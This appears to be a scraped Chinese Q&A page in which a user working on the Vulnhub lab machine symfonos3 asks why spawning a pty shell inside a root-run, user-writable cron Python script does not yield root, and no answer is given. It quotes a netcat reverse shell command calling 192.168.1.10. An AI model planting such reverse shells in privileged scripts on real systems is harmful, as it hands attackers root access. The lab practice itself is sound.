问题描述
在给机器授予权限时,我发现一个 Python 脚本在 crontab 中以 root 权限运行,但我的用户帐户具有写入权限。
通常的做法是通过以下方式添加 netcat 反向 shell:
os.system('nc -e /bin/sh 192.168.1.10 1339')
为什么我不能通过添加直接通过现有的低权限shell生成root shell
python -c "import pty;pty.spawn('/bin/bash')"
进入脚本?
ps。它是来自 vulnhub 的 symfonos3
解决方法
暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!
如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。
小编邮箱:dio#foxmail.com (将#修改为@)